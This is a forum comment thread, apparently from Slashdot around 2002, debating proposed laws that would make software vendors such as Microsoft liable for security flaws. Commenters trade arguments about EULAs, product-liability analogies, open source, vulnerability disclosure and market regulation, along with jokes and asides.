To avoid endless legal battles over wording, the government should define an entity whose role would be to design, draft and maintain a *very specific* scale of security levels which defines strong standards for security features within software packages. The scale could not only provide very precise security requirements for software, but also standards type of compensation to the consumer for failure to meet each of its levels' standards.
Such scale should be massively advertised thru all media so consumers would know to look for a software package's rating on such scale before purchasing it for any mission-critical purpose.
We could let software vendors rate their own software packages according to this scale. If the scale is *specific-enough* and clearly defines levels of security, then consumers should have very strong cases to bring to class-action law-suits to seek compensation in the case such software should fail to meet all of the requirements defined by their advertised grade on the scale.
Such model would keep the government's involvment minimal and place all of the liabilities on the software vendor, so consumers don't ever have to seek compensation from some government-sanctioned entity which would assign ratings to software packages. We must keep in mind that computer software is by nature a highly volatile, constantly evolving, and rarely flawless type of product, as every new piece of software written is by nature "cutting-edge".
Extraordinary Vacations. Exceptional Prices
What's obvious malpractice to you and me, might not be so obvious to others.
DMCA, Hollings, Palladium. What might have sounded like paranoia is now common sense.
no laws can be made to punish the software companies for faulty security or stability.
in EVERY Eula I have ever seen and read there is the following clause...
XYZ co is not liable for any use or misuse of this product, in fact the product is not warrented in any way or even for sutiability for any purpose.
All EULA's have the standard disclamer that this might work, and it might kill 1/2 the planet's population...
Do not look at laser with remaining good eye.
I'm not sure it's fair to hold Microsoft responible for making possible the actions of a malicious hacker. Is it Honda's fault a slimjim opens the door of my Civic?
It may depend on how easy it would be to prevent a slimjim from working, and if they're informed of the "defect." I'm not a products liability lawyer but you might argue if it was reasonably easy to design cars so slimjims don't work, then car manufacturers should be liable for not changing their designs. Or at the least put warning stickers on the cars.
Actually now that I think of it, I guess a car thief's actions would be a supersceding action that would break the causal chain, or something.
Your liabilty is limited to twenty times the total of what you paid the company for the product.
GNU'ed software is sold at a cost of zero, therefore zero liability.
Now if a company had 100 workstations running some product that they paid $100 each for, then the liability would be $200,000 ($100x100x20). One good slip and a company could be taken out to lunch by lawyers. Let's see, there's this one rich monopoly that the lawyers have their eyes on.
I just envision this giant OGRE game, but instead of the Ogre there's Bill and a million lawyers nipping at his heels as he tears through them belching cream pies.
I used to wonder what was so holy about a silent night, now I have a child.
It's "stupid"? Good way to lead off into a constructive debate. In any case your take is hardly surprizing among the paranoid, apparently always-law breaking and being censored against Slashdot crowd. Despite the fact that 95%+ of your life continues and will continue to be "local", the Slashdot crowd continues to pretend that it's a global, borderless universe (what a laugh).
Firstly, I'd like such a feature to be optional. Secondly it provides no more information than can already be obtained via IP traces, just in a more effective manner that can be used for more effective (hence profitable for sites like Slashdot) advertising, as well as more intelligent features for services which are geographically located (WHICH ALMOST ALL ARE! Jesus I can't order from half the online stores in the US: You get to the end of wasting your time to find out they don't ship to Canada. Of course they could also calculate duties, etc, though I suppose in the fantasy world of Slashdotland we can just ignore national borders?
Sooo, if I need to add a "feature" or patch to an M$ program in order to, oh say - keep certain resources on a schedule, would that violate the law?
Seems I've already violated Microsoft's "license"... as it's called. Hey, I'm just trying to figure out how many years in jail we retired IT workers will have to serve.
NIMBA a NIMBA stupid NIMBA coding NIMBA bug NIMBA NIMBA left NIMBA many NIMBA NIMBA NIMBA systems NIMBA NIMBA open NIMBA NIMBA NIMBA NIMBA NIMBA
I wonder what this acronym is supposed to stand for. At first, I thought it meant "Not In My Backyard", but that's usually spelled NIMBY.
Not In My Butt AGAIN ?
I think this is a great idea, and should be extended into other areas. Penalize people who get sick. They should have taken better care of themselves and are costing the rest of us money. And people who have their houses knocked down by an earthquake or flattened by a storm should be fined as well for not taking the proper precautions.
Would these proposed laws provide loopholes for the government's electronic eavesdropping tools like magic lantern and carnivore? Allowing these devices access to your data does not promote security, but it seems that these tools are the next big thing in U.S. intelligence gathering operations. Passing laws like this would create even more hypocrises within our government.
It took legislation to make cars safe. The auto companies hated it. They fought every inch of the way. But it made the auto industry grow up and make their products really work, no matter what.
Every major industry goes through this transition, where society insists that the technology work safely. Railroads did. Steam boilers did. Autos did. Civil engineering did. Electric power did. It's time for computing to do it.
It's time for the software industry to grow up and stop hiding behind one-sided licensing agreements. Software is too important in modern life to be as crappy as it is.
> In any case you could equally say that Microsoft provides you the binary so why don't you just hexedit the security faults out.
We can't do that, because modifying or reverse-engineering the code is forbidden by the EULA.
So there.
Virg
"This program has made an illegal operation and will be shut down."
Though the article mentions Microsoft because of their security record, I think that the drafters of the proposal are "thinking of" consumers, not the fortunes of any one company/group of developers. And, I believe it is the ethical duty of software developers, whether Open Source or proprietary, to think of the users of our software as well. Which is why, as I've said, if drafted correctly I'm not neccessarily opposed to such a law.
With regard to the specific example of IE, well, if IE has a security flaw that exemplifies gross negligence, then the fact that it's free won't mitigate against liability. If the flaw is in an OS component (as much of the functionality previously offered in IE is now embodied), then it wasn't free, was it?
WRT to the "seldom used" product, well if the company charged money for it, and if it had a security hole which caused actual damages to one of their customers, why shouldn't they be liable?
What I find far more scary is that if this were to be passed, software vendors would stop telling people that their software was buggy, in the hopes of hiding it. This was exactly the same tactic Microsoft took when releasing the XP patch- they didn't instantly recall their product, they sat on the bug for two weeks while the rest of the world floundered. Microsoft did this just for marketing- imagine if someone was also planning on pressing charges! More extensive laws will obviously just intensify this problem.
Another curiousity- consider for profit companies, hired by either the government or opposing vendors, whose soul purpose is to exploit software in as many ways as they can, to make sure the American people are "safe".
The gov't should not legislate the quality of software (what a frightning thought), the market place should demand it! Once there is real demand for it there will be vendors falling all over themselvs to prove how safe thier wares are. And eventualy the best quality software will win out. Even MS cannot ignore the market for more then a few years. But the market has to tell MS to make a better product (competition would help too).
~Sean
You can sue anyone you'd like to in civil court, so long as you can demonstrate damages.
You are correct that there are some professions with prominent and/or government sponsored board certifications as well as regulations, but this deals more with a person's ability to practice and be insured within a profession.
A lawyer may be disbarred but not sued. He/she may also be sued but not disbarred. In fact, he/she can even be sued if he/she was never a member of the bar (perhaps even for that reason).
The reason why there have been few lawsuits with programmer/software company defendants is that most software comes complete with legal disclaimers for damages done or data lost. As of now, very little software comes with any kind of operational guarantee or implied liability, especially when it comes to potential security exploits.
On a side note, however, perhaps we should stop this thread, for fear that you've planted the idea of programmer certification in the minds of legislators.... before you know it, we programmers might not be able to "practice" until we're well into our thirties.
Raster actually releasing E17 bug free...
Like Gilbert actaully fixing the bugs in epplets
like Migual making MONO work without Microsoft bugs
Like Mandrake wining qt content
Sure why not? A piece of software should have a meaningful warranty and should comply with its own warranty. If software causes irreperable damage to something we're way beyond, in the year 2002, the days where "Hey if anything at all happens, if the software even works at all it's not our problem.
If software has a problem which causes me to lose money or to lose my identity or some other problem there is utterly no reason why the software maker can't or shouldn't be held responsible for fundamental flaws. We're not talking about usage or configuration or intended use but about basic patchable problems associated with forseeable risks. No product liability is intended to hold the manufacturer liable for anything, but instead for reasonable use. You can't reasonably sue a hairdryer maker if you drop it in the bathtub but if in normal use it bursts into flames and burns you - yeah you sure can. Same with software. If you're using it correctly and some fundamental problem that could have been uncovered if they bothered to do some rudimentary checking then they should be held liable as well.
Your OS has the word Secur in it?
(www.nsa.gov/selinux)
Hey. Wanna hear the most annoying sound in the world?
If you for whatever reason have a whim for insecurity, you're still a menace to the rest of us. I have access.log files documenting codered and nimda attempts from last July to this afternoon to support this.
/. over the last couple of months, and it's illogical. The same m$ apologists who beyond reason shout that their platforms are securable are likely to lecture us on how bandwidth is expensive and that we should expect to pay more for it. (I'm not saying you're one of those guys).
I've noticed a pattern in
Beyond that they percieve they don't have enough money, it's difficult to link the two notions sequentially.
Yielding to the corporate apologists for the sake of conversation, okay. Bandwidth has a total cost of production, let us stipulate. So the bandwidth consumed by codered and nimda can therefore be quantified into a currency value, even if the cost of some (or most) of the bandwidth is distortedly overpriced
Certification of individual connections by independent third parties is an excellent suggestion for the following reasons:
It's honest work for qualified people. Enough to benefit the economy. Really.
It's good for business models within the industry - users running demonstrably secure platforms like Linux or one of the BSDs (to name only a few) could be given privelages or discounts calculated upon their degree of armor.This could even be stratified, but knowing how MBA and marketing types love complex pricelists I dunno if I want to encourage this to extremes.
The security tests could, and should, produce specific and measurable feedback. M$ claim that codered and nimda have been successfully dealt with but my logs illustrate a different story, I don't care because my ISP pays for the bandwidth, but they need to worry, and so do their shareholders in the case of pubically-traded ISPs..
Actuarial computation isn't new - it predates business computing in fact by a coupla hundred years. Just as teenagers who wanna drive Corvettes have to pay accordingly high insurance premiums, users of risky operating systems should expect to pay additional charges to help, if not entirely cover the cost of hauling away the corpses.
This may not be of unique benefit to Billy, but it's perfectly fair and equitable to the rest of us on the planet.
give me a
Microsoft has been known to find extemely large security holes and not release patches for them until the holes are public. This is a good device for spin control. I would completely support a law that slapped them with a fine when they did stuff like that. Also Microsoft takes longer than any other vendor to release patches once alerted to security holes, exept for SCO. SCO will flat out not patch security problems that they know about. Me and friend sent a security that allow remote access penetration in SCO UNIX over 3 years ago that has yet to be patched, we send them a reminder every 6 months or so and they still just do nothing.
Read the article you dolt .. Lance Spitzner is Sun Security who reported the problem to CERT from the Honeynet logs!
At least there's active discovery and acknowledgement of their holes and an effort to help the entire community.
I am a security engineer at a financial company in the US. If my company buys and implements a piece of software with security holes, we are held liable under GLB. Why shouldn't the developer as well? It seems unfair to only punish the consumer. McDonald's is held liable for bad burgers and software companies should be too.
Under GLB my CIO can spend time in jail. Just think your CIO installs a farm of ISS (eeek) servers. You get cracked, and some guy in China has all your customer's SSNs. Now your CIO, Gates, and Baldwin become bunk buddies for the next six months. Hmmmm......
I'm sure that this is targeted at Microsoft, but there'd be a lot of $$$ made off of the folks that developed/distributed BIND and SendMail. Couldn't it also punish sites like Download.com?
... bits and bytes are insignificant when compared to the needs of the world and future generations, and anyone who thinks otherwise needs to re-examine their humanity) I seriously doubt you'd see any improvement for the consumer - the government is the only one who stands to gain, and that kind of greed puts them on the same level as Microsoft.
I know the argument is, "If it's free, it's not liable". So Microsoft reworks its liscense in such a way that all linked libraries are free (that's an oversimplification) or that you're paying for the right to install, but not the operating system itself. If they were still liable in that instance, then RedHat/Mandrake/Debian/etc would be in deep do-do.
So how do you prove that the software vendor is liable? If you're brakes fail because you never filled your fluid, then the manufacturer is liable. If your operating system fails because you didn't patch it (and a patch was reasonably available), how different would the situation be?
What about modification? If I put aftermarket rims on my car, that will likely void my warranty and some issues of liability (oversimplification, again). So, a software vendor could make claims that "unauthorized" software (probably open to their interpretation) could have "unexpected" interaction, possibly releasing them from liability.
Another thought: safety recalls. Most of the time, there are not fines for "unsafe" products - there are voluntary or government mandated recalls. If you choose not to return the product, that's your fault. So, when there's a new "security flaw", MS recalls Windows, and you have to uninstall it from your computer and return your media for a refund or replacement. How would that fly? (Many "simple" consumers have a hard time differentiating between the computer and the software: they bought a "Dell": further complicating things)
Retrospective? Would this only apply to new shipments, or to all of the copies of Linux, Mac, and Windows already out there? That's be a tough sell.
The bottom line: this is motivated by politics and money. It would do nothing to enhance security and consumer rights. Many large companies will freely dump their waste, knowing that it's cheaper to pay the fine than it is to dispose "the right way". They just consider the fine an operating cost, which usually gets integrated into their pricing structure. So MS raises their prices to accomodate fines. I seriously doubt the fine would be significant. (Go back to the dumping example: if software flaws result in a bigger fine than destroying the environment, we're all in trouble
The best thing about a boolean is even if you are wrong, you are only off by a bit.
Safety and Security are different ideas.
If you sell software that self-destructs, or by some inherent defect, destroys data without external intervention, I can deal with your product being considered negligent.
All products have exploits. As mentioned in the subject, there are a million ways to "crack" a car that can result in damages. We hardly require auto manufacturers to protect vehicles from exploits used externally with malintent.
Without self inflicted damage, I don't see any reason to assume liability.
Instead, why not create standards for security for the different type of applications? Companies who follow these standards can say 'we will code this to be XYZ1.2.3 compliant'. If they say this and aren't compliant, they could be held liable for damages.
Lots of people hate MS for numerous reasons. Some people write software for free so that others can use it and don't have to pay MS for it. Some people pirate MS software, taking away from their precious revenue. Some people talk shit. Some people sue. Some people create virii and worms to exploit MS software flaws so that lackies can see the light. Some people write things for fun. Some for money. Some for a vendeta. And whatever other crazy ideas go along with killing the beast.
Right. A better analogy (going with the car theme here) would be something like:
I have a $30,000 check sitting in my car, not necessarily completely hidden and locked in the glove box, but out of view none the less. Now, my car is an '86 Caprice Classic. So basically if anyone is actually looking (which in this industry they would have to figure out what server the info is on), they'd be able to get into the car with a slim jim, no problem. Rifle around a bit, find the nice check, sign the check over to themselves and there ya go. (If you're having problems with the check thory, you can still use an American Express credit card as bait.)
Is it Chevy's problem for making crappy locks, or should I have taken the check out of that car and put it into a 2002 Lexus with all the bells and whistles of alarms it takes to get in there. If you don't have the security, don't put valuable information on the machines, that's your own stupidity, not the software companies'.
If a and b in c, and a can create b, and a can create a, and b can create b, and b cannot create a, then a created c.
woo hoo. bring it on. White hat hacking has been dead since every last one of them sold out to the "security industry". Bugtraq serves the sole purpose of distributing exploits to kiddies to keep the "hacker threat" in the media. Down with bugtraq. Down with bugtraq. Down with bugtraq.
How we know is more important than what we know.
Enough already.
Claiming the most secure version of windoze is like claiming to have the tallest building in Topeka, KS.
give me a
I get so tired of all this Topeka bashing on here! It's time for the Big city nazis to stop their ways and once and for all admit that Topeka is a very safe, secure community with much to offer its inhabitants!
(I can't believe I posted that..lol)
-Q
"I was not put on this earth to listen to meat! Frylock..were you?" -Master Shake
thanks its amusing to watch someone like you try to use sarcasm and end up looking stupid
Restaurateurs to be made liable for damages due to bad-tasting food...
Construction companies to be made liable for products which cost too much...
DaimlerChrysler sued by customer who claims his Viper "didn't get him chicks"...
Capitalism fails...
</SARCASM>
C'mon...the market will solve this problem. If people really want security, they should buy the God Damned software that features security. If you buy the software that does not feature security, you are S.O.L.!
Should Microsoft be punished by the courts for its operating systems having shitty uptime? Should you be able to sue GNU because you don't like the names of the command line switches for tar? How is an operating system's security, or lack thereof, an issue that needs to be addressed by our government? Laissez-faire, buttmunch!
<RE_ENABLE_SARCASM>
OTOH, there are an assload of software developers writing shitty code who need to be whipped into shape by the threat of lawsuits...
</RE_ENABLE_SARCASM>
I mean think about it: Microsoft has always been the majority leader in software systems, and any secure software law will ultimately affect them the hardest. OSS probably won't be touched as hard. Why? I think it's probably because of the public license. Most of the software systems out there, such as MS's systems, require an outlay of money simply to acquire the software or liscenses to install multiple copies. If the product is insecure then the company who created it can be liable, since they SOLD it. There was a legal, monetary transaction for the product and the consumer should have certain rights that protect them from faulty products.
OSS on the other hand is typically implemented by people in IT who know where to obtain software updates when needed (note I said TYPICALLY), and since there is usually no money outlaid for the software except perhaps for distro packages, who's to be held responsible for a bug in it?
I said this a while back and I'm saying it again:
There should be criminal and civil penalties for withholding information about security risks. Right now I do not have the legal right to know about security risks that are discovered in systems I use, the creators of those systems are not legally required to inform me when a new risk is discovered. This means that I can not make an informed decision about how to protect myself from the problem. I can't even use a list of currently unresolved risks to help me decide what systems to use and/or purchase.
To me, the withholding of security risk information is a form of fraud. It is the same as rolling back the odometer on a used car. It is the same as selling Pintos with exploding gas tanks and the same as selling flammable pajamas to children. Companies must be required to release security risk information about their systems in a timely manner. They must be legally liable for damages that result from security issues between the time they discover the problem and the time they warn users of the problem. These kinds of penalties will force companies to create secure systems in the first place. And, to warn people in a timely manner so that they can take action to protect themselves. Although it is tempting I don't think the developers should be required to fix the system. But, a list of all outstanding security problems must be included in advertising and on the packaging of any system. People have to be able to make an informed decision about what systems to use. We put warning labels on beer and cigarettes, we require people to wear seat belts, we require the disclosure of the ingredients of all our food, we have lemon laws to protect us from unscrupulous car salesmen, and we have product liability laws that cover every physical thing we purchase. But, we have no equivalent legal protection from the purveyors of software snake oil.
The only way a company should be able to get out from under these penalties is to declare the product "dead", notify all customers of record that no more security support will be given for that product. Declaring the software dead should also require that the source code and/or system designs as well as any patent and copyrights to the system be released to the customers so that customers can arrange for other sources of security support for the system. At that point the company would not be allowed to sell, distribute, or accept any sort of payment including royalties and support payments for the software.
Stonewolf
Though, I don't know what a real law would look like...
Consider, say, the hotel I was at years ago... they had an indoor pool. Before you used the pool, you had to sign a waiver... they had a stack of them in the pool room.
The waiver basically said using the pool was at your own risk, etc, etc.
Now... Dad asked his lawyer later, for kicks.
Say you drowned becuase you couldn't swim.. and they had no lifeguard. This document would protect them... it was fairly clear there was no lifeguard.
But.. say the diving board was in disrepair, and broke off while you were about to dive, causing you to fall and break leg... guess what? That contract doesn't absolve them of responsibility. Why? Because... it was reasonable to expect that the diving board worked.. the owner still had a duty to keep the area safe for it's users, regardless of their waiver. (If they wanted a waiver to protect them against that, they would have to clearly state the risks.. state that the facilities are in bad repair and broken.
Now.. software, we have these horrible EULAs... but still. I can understand how it's okay for a company to, say, protect itself from being sued over some little bug.. of COURSE they have to. Like.. say Excel crashes while you are in the middle of some work.. and you have to re-do it, so you are late for a meeting, so you lose the deal, etc.
Just as in the real world, where even a disclaimer can't generally release you of all obligation, so should it be with software. I don't know what the wording would be, or what would be fair... but software vendors should have a certain level of accountability for what they do.
Now.. how does this affect OSS? I don't know. Do I think OSS authors should be responsible for what they do? Yes, to a degree.. but there is a problem.. I don't think someone should be sued just because they shared some code with the world and it didn't work.
I think its sad because in most industries the market (consumer intelligence) reflects the success of a product - and if Microsoft manufactured cars they would've been out of business a while back due their flawed and undertested designs (obviously car crashes are more severe than computer crashes).
My opinion may be harsh on this topic but I feel that governement intervention should be avoided in this situation - let the Microsoft users suffer the result of their decisions.
If someone was warned not to cross a highway and they did, well they suffer the consequences of their own actions.
Eventually, most people will switch products or run out of money supporting their flawed (hackable) ones.
Lets not create an organisation that will end up being Microsoft's beta team.
This has nothing to do with the discussion.
Look, there are insecure software packages out there. But for each of those insecure software packages there is a more secure alternative. If anyone disagrees with me and has a specific example, please reply.
If organizations have been choosing the insecure packages, they have made their bed to sleep in. Asking a government to step in because they made a choice that turned out to have more risks than they anticipated is disengenuous and naive of that organization.
obviously no deficiencies vs. no obvious deficiencies
It'll probably be as wildly succesful as the anti-spam laws. In all seriousness, that would destroy what little of the tech economy we've got left. Nobody would write code anymore for fear of being sued.
If commercial entities were liable for security flaws opposed to Open Source projects (due to some kind of liability exemption for them) companies like MS had a great marketing argument going for them: "Right, you have to pay us for the product, but if you do so you get this really nice, shiny warranty, and if anything happens to your net your ass is covered. If you use the big bad penguin, those guys aren't liable for anything, so if you are reasonable: "Noone ever got fired by buying Microsoft". Bye bye Open Source in large companies, the company lawyers would hunt down and kill all Open Source being used to be able to sue in case of trouble.
Already some insurance companies that offer anti-hacking cover are charging higher premiums to clients who use a lot of Microsoft software because vulnerabilities are so regularly found in it.
With tactics like this already in place, not only will Microsoft lobby against it, but so will the insurance industry.
MS will say that it is unfair to be responsible for the actions of hackers/crackers after their software has been released, stating that they have no control of what people do with/to it after it has been sold to the public.
The insurance lobbyists will probably say that laws of this nature are unwarranted. They already have a system in place to protect corporations (for a price).
I also did not like the wording at the end of the article implying that the sys. admin. could be held liable. That seems outrageous, if they are not allowed to put up the protective systems of their own choosing.
It certainly does not claim that Microsoft is responsible for most security issues. If it had I would have expected Butler Lampson to have resigned from the board. It is not usual for NAS reports to target particular companies. It is not likely that David Clark would attack Butler in that way given that they are both LCS computing profs.
The statement about Microsoft is actually introduced from other sources but in such a way that the casual reader assumes it was a recomendation from the report. The only occurrence of the string 'Microsoft' in the text is Butler's accreditation.
Likewise I find it hard to find any recomendations. The majority of the report is simply a post 9-11 rehash of three previous reports by the same board. The nearest the report comes to suggesting legislation is:
Consider legislative responses to the failure of existing incentives to cause the market to respond adequately to the security challenge. Possible options include steps that would increase the exposure of software and system vendors and system operators to liability for system breaches and mandated reporting of security breaches that could threaten critical societal functions
That is quite a way from endorsing legislation, which is hardly surprising given the makeup of the panel.
Looking for an Information Security student project suggestion?
Try http://dotcrimeManifesto.com/
"Possible options include steps that would increase the exposure of software and systems vendors and system operators to liability for system breaches,"
the only person(s) liable for a system breach are the people who committed that breach.
While punishing companies for writing insecure software is a start, how many times has it been that a poorly configured server is at fault (ie, not setup correctly or not up to date on patches)?
While a certain level of responsibility lies inside of the software vendor, a still larger majority is with the server administrator.
The patch for Code Red was released in June. CR didn't come until July, iirc. However, millions of people did not patch their systems. Or shutoff the silly thing (IIS or ISAPI, take your pick) in the first place.
It is both groups fault in this scenario: Microsoft for having IIS on by default with it and the end user for not shutting it off.
However, I think it does lie with the end user to be responsible ultimately in maintaining their equipment.
I don't know about the rest of you, but when I use open source software, I don't personally verify that the software is written to my own personal specs.
I actually use the software under the mentality that the source is publicly available, so some other people (who are both more qualified and care more than I) have had the opportunity to review the code and have possibly improved it.
Thus the responsibility for the correct operation of the open source code is partially that of the original writer, the whole open source community, and the user. Since this is such a vague group, it's difficult to hold anyone financially liable for problems. ("Are you a member of the open source community?" "If you're here to sue me, no, I'm not.")
However, it seems like common sense that open source software is provided with a "use at your own risk" type agreement and any trust you have in the software is the same as trusting this vague open source community entity. I'm not familiar with the nuances of the different licenses, but if the "use at your own risk is not explicitly stated in the public license, maybe it should be. If it already is, then that's a settled matter.
In the case of closed source software, there is a very clear boundary of who wrote the software and thus who may be held responsible for any errors or damage the software causes.
Next, most closed source software is probably sold for a profit. Thus it is the responsibility of the user also to demand some sort guarantee or warranty or whatnot from the software provider before handing over money for a product that may or may not be suitable for the user's needs. If security is a key need, the user is supposed buy the software that is guaranteed to be secure.
If the software provider sells a product as "secure" for instance, the user has a right to expect the product to be "secure" as advertised. If it is not, however, the software provider should be held responsible for the same liability as any company that provides defective goods. (i.e. the consumer can sue them for damages caused by defects etc.)
That's why I believe closed source software providers should be held liable for damages caused by defects in their products, whereas the open source community cannot be.
Analogies suck. There is very little in common between fixing cars and fixing software.
How about simply looking at software?
Fixing software is *hard*. It is hard to find the location of bugs in code. It is hard to fix bugs in code. It is unreasonable to assume that the average user is capable of fixing bugs on his own.
So we give them the instructions...
It's still hard. For the average user, it is hard to understand how to go about applying the fix. It is hard to figure out how to compile the application. It is hard to trust the newly-generated executable. It is unreasonable to assume that even with instruction the average user would be able to fix the bug on his own.
To tie this all back into the thread, Open Source software should not be considered exempt from such a (stupid) law just because it comes with source. The source of a program is of no value to the vast majority of its users.
Luckily, this law will not pass and the OSS and GNU and all the proprietary software houses will continue on their merry way without invasive governmental regulation.
With open source, the source code is there for others to fix. That's the whole point of open source. With companies like Microsoft, you get someone sending them an exploit, and them taking 4 months to fix the damn thing because they don't want to hurt christmas sales. I think that a company, especially someone who is charging you for upgrades, and you assuming that it's going to be more secure, be liable to a certain extent. Many companies are pushing for you to upgrade your software, but what are we really getting? I don't need a clipboard buddy, I want something more stable, and more secure.
I have no signature
I think it's a great idea, but if this law was passed, think about the repercussions. People could abuse this by hitting companies up for buggy wares left and right. Not that it's a BAD thing. Maybe it'll give companies *coughmicrosoftcough* the kick in the ass that they need.
see sig. see sig run. run sig run.
If they weren't calling in federal marshals for help in conducting audits, it might seem different, but what possible excuse is there for releasing them from any and all responsibility while THEY can have people with guns and warrants busting into your workplace and tearing apart all your computers?
Hold them to the same strict code that they hold others, and give it just as many teeth as they want to use against you. Granted, that would be hard (imagine getting a warrant to rip apart all the Windows development systems at Microsoft to look for evidence that a bug was maliciously ignored!) but it is starkly insane to expect these guys to have police-like powers yet be exempt from all responsibility themselves.
One element which you are forgetting is that the free market depends upon its participants being knowledgeable
This is not necessarily true. Given a large number of unknowledgable participants in a market, to the degree that they cannot tell if they have chosen a poor product even after the fact: some of them will choose poor products, and by luck some will accidentally choose better products.
Those that go out of business will stop buying the poor products, or at least not expand as quickly as the business which made better decisions.
In reality it is somewhat difficult to tell how good your security is until youve been breeched.
It is also true that the market is not really large enough for a fully liquid "Free Market".
The truth is somewhere in the middle, where companies that make it their business to be informed about security will have an advantage over those that do not, hence government intervention will be bad: it will encourage businesses to let an external organization worry about their security.
Snap! I was going to say that, but you wrote it for me.
Personally, I think the greens and libertarians should merge.
I am a green, yet I'm not a socialist or pro dope. I'm a capitalist and a believer in freedom.
Maybe they should regroup as liberal greens?
- Kaos games and encryption systems developer
Most security breaches stem from misconfigured software not actual bugs in the software.
If the government wants to see some progress made in nation-wide computer security, they ought to not waste money punishing big dumb companies, but instead fund the geeks over at the NSA to work on Open Source security-related projects, much as they did with Linux and ACL's. Otherwise, I fail to see the courts could be objective. Accidents happen. Would companies get a quota of security holes per year?
Everyone would be in violation....
And of course, if Microsoft is too important to the country to be punished under anti-trust law, what're the chances they (or any other large corp with big bottom lines and lots of legal dollars) would be punished under security law?
BUT.... what if security _claims_ were regulated by a much tighter law -- say, much like SEC filings. I have never read a prospectus that was anything but pessimistic about a company's prospectus -- that's because they know that if they put anything that's hype in it, they may as well write a check out for the lawsuit that's coming and perhaps pack for a trip to white-collar jail. OK, unless you're Milliken(?. that one guy pardoned by Clinton who hid in Switzerland for 10 years).
Require an SEC like full disclosure of known vulnerabilities. Assess daily penalties for each week a known vulnerability is kept secret (if you like, only assessed from the day it's found in the wild). Make advertising about security a binding promise. Software companies would be a lot more careful about what they claim and more forthcoming about actual information. And in the presence of more perfect information, the market will serve ALL parties more effectively.
Just my thoughts....
Libertarianism is rich wolves and poor sheep playing gambler's ruin for dinner.
Crimes against Digital Humanity would be the top capital crime, and special courts could be set up by the UN :)
I can just imagine a room full of complete geeks, pocket protectors, glasses, bad hygiene and all, discussing whether or not they were emotionally ready to release their next application.
And they pass the losings on to you!
Thats right, now you have to pay higher prices for the same software, whether or not the software itself has flaws, but if the company is losing money of other software, they have to make it up don't they?
So what does this wind up as? Taxes. The people pay higher prices and the fines go to the government. Though, presonnally I like higher taxes (I think it benefits everyone) I don't want to see it having a large impacton one segment of the market.
We have all seen that the only people/corporations that can successfully dodge litigation are those with enough money to throw enough laywers at the problem. A law like this would basically guarantee Microsoft a future with little to no competition. Small companies that do not have the financial resources to defend themselves against lawsuits that this new law would allow would die. Microsoft would be able to defend themselves just because they have the money to do so, not because their software is better.
Let the market decide! Let the people choose the software that is most secure! A law like this will not help consumers. It will only kill off the small companies and individuals who are innovating and trying to give people choices!
Ask any pharmaceutical or biotech company what happens when one of their products fails and someone is injured. They'll tell you often times there are criminal as well as civil penalties. If Ford had to make a safe Pinto, why shouldn't software vendors be forced to make secure software?
Many will argue that bad software isn't life threatening, and therefore doesn't require stiff penalites, I say baloney! If the firmware that controls the hydraulic systems on an aircraft fails in flight you probably won't survive. If your database on your e-commerce site gets hacked due to a "buffer overflow" error, and all your credit cards get out on the web, shouldn't someone be held liable for the damages...or are we going to let the insurance industry just mop up the dammage and pay for it with higher premiums.
There has to be some accountablity for negligent behavior.
-ted
Now when you install my software, it will disable all your I/O -- ethernet, serial, CD, as well as every other piece of software on the system. If you want to re-enable these, go ahead, but that's an unsupported configuration and will void the warranty.
-B
Not that this wasn't entirely predictable.
It seems that most "good" applications Microsoft has their name on it are purchased from someone else.
Internet Explorer, Ages of Empires, Frontpage, Word's proofing tools, ... go read the credits.
It's about time software people are subject to the same rigor that hardware people have to deal with. I've worked in hardware. It always seems like hardware is held to a much higher degree of perfection than software.
The screw is too long? You're fired!
The software fucks up in mind boggingly STUPID ways? You're a manager!
Remember the Pentium bug? Most people could have cared less about such an obscure function. Yet Intel got a lot of bad press for it and had to replace lots of chips.
If the hardware is not 100% right away, people flip out. If the software crashes all the time, hey just reinstall it.
This is totally unfair to hardware people.
It doesn't matter how many valid arguments that are presented, the law makers here in the USA have consistently exposed their technological ignorance by passing laws against the public good, and that are only in the interest of companies that paid for them.
You may be right, but here that's not enough.
they don't spell it out like your mom does
like when your mom tells you to take your hands out of yer pants when yer havin yer little see eye ohhh fantasy?
I thought America was the home of the free! Don't get me wrong, I'm all for more secure software, and I think open source is one of the best ways to get this. American companies should be free to do what they want (within reason of course), and this includes making insecure and overpriced software. It is the consumer's job to distinguish between something good and something crappy, and we have security experts to help them make that distinction.
We want to destroy the DMCA that restricts our freedom of speech, and yet we want to RESTRICT companies from doing what they want. This sounds hypocritical to me.
We seldom regret saying too little but often regret saying too much.
I think the most amusing part of the article was this:
Even the animated paperclip that acts as a helper in some Microsoft software can be compromised and turned against the computer it is being used on.
NO! Clippy! What are you doing?!
"Anonymous cowards are just K-whores afraid of their accounts being modded down." - Bob the O (me)
The more important question is: What will this mean for Microsoft? Their operating systems are about as secure as a door with a broken lock.
[insert witty comment here]
not true, /. also covers this holesometimes
- Kaos games and encryption systems developer
I'm programming an operating system which is made on the basis of usefulness.
Fortunately, I'm in New Zealand, so I can write: encryption which is better than US military spec, illegal in the USA, UK, Russia, France, China and other places where freedom is dead.
programs that may mutate over time.
programs that hasn't been tested.
programs that don't really crash like windows.
And I can say get stuffed to anyone who wants to apply foreign law to my products.
- Kaos games and encryption systems developer
I actually am being censored by my government. I am classed as an economic threat and a potential terrorist by GCSB.govt.nz
Most of my life is global, I want to release software that has encryption which is illegal in the USA, UK, France, Russia & China.
Allowing more censorship is not a good idea.
Try ordering from a country which is only known for Lord of the Rings.
I can ignore national borders because there is no border to NZ or Australia.
Australia is my second country, it only has state borders and I have never crossed a national border.
- Kaos games and encryption systems developer
This really is such a bad idea it's not even funny. Who can afford to have insecure software and jack up their prices to pay for it? Certainly not any small growing shop. The cost of one serious incident could easily put a small company out of business. And this is supposed to make software more secure by turning it over to large corporate entities, many of whom have dubious track records on security?
You get not what you pay for, but what you sign for in your support contract. If you don't dictate the terms of the contract, then vote with your money on a vendors security record.
I'm not following your logic at all. How did you get from modifying the source of a program vs. hacking the executable to GPL issues? To wit, the original discussion was about modifying a program your company uses. My point was that altering OSS was different from hacking Microsoft because you're not legally allowed to hack the .EXEs, but you're legally allowed to monkey with OSS. The GPL in this case would only apply to redistributed code, not "internal, proprietary software development" (your words). And while RMS and Co. could lay on a lawsuit charging you with pilfering GPL code within a program you sell, they'd have to prove it just like anyone else who wants to sue you, so there's no larger risk of litigation than from any code jockey you ever come in contact with.
> Of course all code isn't GPLd...but that which is represents a similar risk to the EULA.
